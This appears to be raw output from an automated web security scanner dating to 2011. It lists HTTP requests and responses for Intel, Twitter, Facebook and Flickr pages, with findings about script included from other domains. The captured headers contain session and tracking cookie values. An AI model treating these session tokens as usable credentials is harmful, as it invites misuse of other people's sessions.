<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head>
GET / HTTP/1.1 Host: idfcommunity.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:17:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 116239
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Intel Deve ...[SNIP]... <![endif]-->
GET /about HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 23:21:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 15111
<!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <he ...[SNIP]... <!-- need on homepage for Tw Like --> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script> ...[SNIP]...
GET / HTTP/1.1 Host: objectivemarketer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:21:09 GMT Server: Apache X-Powered-By: PHP/5.2.16 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Vary: User-Agent,Accept,Accept-Encoding Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 3cf9af507c272e66cd36478b26071629=sai9qbst3amoinsloek35rc7u2; path=/ Set-Cookie: ja_kyanite_tpl=ja_kyanite; expires=Thu, 26-Jan-2012 23:21:09 GMT; path=/ Last-Modified: Sat, 05 Feb 2011 23:21:10 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22150
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET / HTTP/1.1 Host: opentools.homeip.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Robots-Tag: noarchive Last-Modified: Sat, 05 Feb 2011 19:27:44 GMT ETag: "1296934064090|#public|en|||0" Expires: Sat, 05 Feb 2011 23:17:13 GMT Date: Sat, 05 Feb 2011 23:17:13 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <script type="text/javascri ...[SNIP]... </script> <script xmlns="http://www.w3.org/1999/xhtml" src="http://www.gstatic.com/sites/p/2fa342/system/js/jot_min_view__en.js"></script> ...[SNIP]...
GET /dev-tools-for-upnp<BR/ HTTP/1.1 Host: opentools.homeip.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Date: Sat, 05 Feb 2011 23:17:11 GMT Expires: Sat, 05 Feb 2011 23:17:11 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <script type="text/javascri ...[SNIP]... </script> <script xmlns="http://www.w3.org/1999/xhtml" src="http://www.gstatic.com/sites/p/2fa342/system/js/jot_min_view__en.js"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
http://platform.twitter.com/widgets.js?ver=1.1
Request
GET /gapingvoid-art-gallery/ HTTP/1.1 Host: scoop.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:42 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.3 X-Pingback: http://scoop.intel.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 39944
GET /EricMMartin HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 06 Feb 2011 01:50:37 GMT Server: hi Status: 200 OK X-Transaction: Sun Feb 06 01:50:37 +0000 2011-92027-14380 ETag: "4f4b360520d46db9d2c40e35326d69cf" Last-Modified: Sun, 06 Feb 2011 01:50:37 GMT X-Runtime: 0.00490 Content-Type: text/html; charset=utf-8 Content-Length: 58941 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296957037715544; path=/; expires=Sun, 13-Feb-11 01:50:37 GMT; domain=.twitter.com Set-Cookie: guest_id=129695703772265016; path=/; expires=Tue, 08 Mar 2011 01:50:37 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJvcqfgtAToHaWQiJTY5Y2RjMDAxZDMxYWUz%250AYmI0ZDRlZDMzMmU5ZjE5ZDEwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--b743a8588e3835a08cf5844d1d8af9bc6cda4b40; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]... </div>
GET /EricMMartin HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 23:22:34 GMT Server: hi Status: 200 OK X-Transaction: Sat Feb 05 23:22:34 +0000 2011-15854-13086 ETag: "b0c81407bf609b9b1cf953048b1105ab" Last-Modified: Sat, 05 Feb 2011 23:22:34 GMT X-Runtime: 0.00598 Content-Type: text/html; charset=utf-8 Content-Length: 58433 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296948154509230; path=/; expires=Sat, 12-Feb-11 23:22:34 GMT; domain=.twitter.com Set-Cookie: guest_id=129694815451621917; path=/; expires=Mon, 07 Mar 2011 23:22:34 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJZQIvgtAToHaWQiJTMyMDRkZDM2M2Y2OTVm%250AMjM0ZWVmYjAyMjcyMGRlYWM0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--cda732cdfd73b9251d4ab751bf5e3c3ba07fa792; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]... </div>
GET /intelnews HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 23:22:36 GMT Server: hi Status: 200 OK X-Transaction: Sat Feb 05 23:22:36 +0000 2011-99178-30534 ETag: "5ef92426ebdf2d0090dae9af07327303" Last-Modified: Sat, 05 Feb 2011 23:22:36 GMT X-Runtime: 0.00428 Content-Type: text/html; charset=utf-8 Content-Length: 50405 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296948156798428; path=/; expires=Sat, 12-Feb-11 23:22:36 GMT; domain=.twitter.com Set-Cookie: guest_id=129694815680453038; path=/; expires=Mon, 07 Mar 2011 23:22:36 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIVZIvgtAToHaWQiJWQ5Yzk4ZmY4Yzc2ODMw%250ANDBmOWI3NmU3NTA5N2I5MmU1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e3633c355f5d65ff6cfe5bdaa2b0cfdaeeaa156d; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]... </div>
GET /widgets/fan.php?api_key=4310e5850ea0577ea41506efdb019db0&channel_url=http%3A%2F%2Fnewsroom.intel.com%2Fcommunity%2Fintel_newsroom%2F%3Fiid%3Dftr%2Bpress%26fbc_channel%3D1&id=22707976849&name&width=223&connections=0&stream=true&logobar&css HTTP/1.1 Host: www.connect.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:21:13 GMT Content-Length: 9266
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]... <link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yX/r/xDKZ0Z55ipf.css" />
GET /projects/simplemodal/ HTTP/1.1 Host: www.ericmmartin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:13 GMT Server: Apache X-Powered-By: PHP/5.3.3 Expires: Thu, 19 Nov 1981 08:52:00 GMT X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 05 Feb 2011 20:00:09 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 33772
GET /Intel HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=PvG3c; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:21:09 GMT Content-Length: 43972
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]... <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />
GET /sharer.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=nQPs-; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:21:08 GMT Content-Length: 10821
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]... <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />
GET /photos/intelphotos HTTP/1.1 Host: www.flickr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 01:51:22 GMT P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Set-Cookie: BX=bhlcf056krvkq&b=3&s=vi; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com Set-Cookie: localization=en-us%3Bus%3Bus; expires=Wed, 05-Feb-2014 01:51:22 GMT; path=/; domain=.flickr.com Set-Cookie: cookie_l10n=deleted; expires=Sat, 06-Feb-2010 01:51:21 GMT; path=/; domain=flickr.com Set-Cookie: cookie_intl=deleted; expires=Sat, 06-Feb-2010 01:51:21 GMT; path=/; domain=flickr.com X-Served-By: www4.flickr.mud.yahoo.com Cache-Control: private Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 65285
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
GET /photos/intelphotos HTTP/1.1 Host: www.flickr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:17 GMT P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Set-Cookie: BX=6dgtddl6krmjt&b=3&s=ve; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com Set-Cookie: localization=en-us%3Bus%3Bus; expires=Tue, 04-Feb-2014 23:17:17 GMT; path=/; domain=.flickr.com Set-Cookie: cookie_l10n=deleted; expires=Fri, 05-Feb-2010 23:17:16 GMT; path=/; domain=flickr.com Set-Cookie: cookie_intl=deleted; expires=Fri, 05-Feb-2010 23:17:16 GMT; path=/; domain=flickr.com X-Served-By: www40.flickr.mud.yahoo.com Cache-Control: private Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 65286
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
GET /business/vpro/alliance/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 57048
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Intel vPro Technology Alliance</title>
The response dynamically includes the following script from another domain:
http://use.typekit.com/yhr6rfe.js
Request
GET /consumer/products/?iid=gg_play+products HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33897
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response dynamically includes the following script from another domain:
http://use.typekit.com/yhr6rfe.js
Request
GET /consumer/products/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33897
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response dynamically includes the following script from another domain:
http://use.typekit.com/yhr6rfe.js
Request
GET /consumer/products/processors/chipset.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:56 GMT Content-Length: 30536 Connection: close
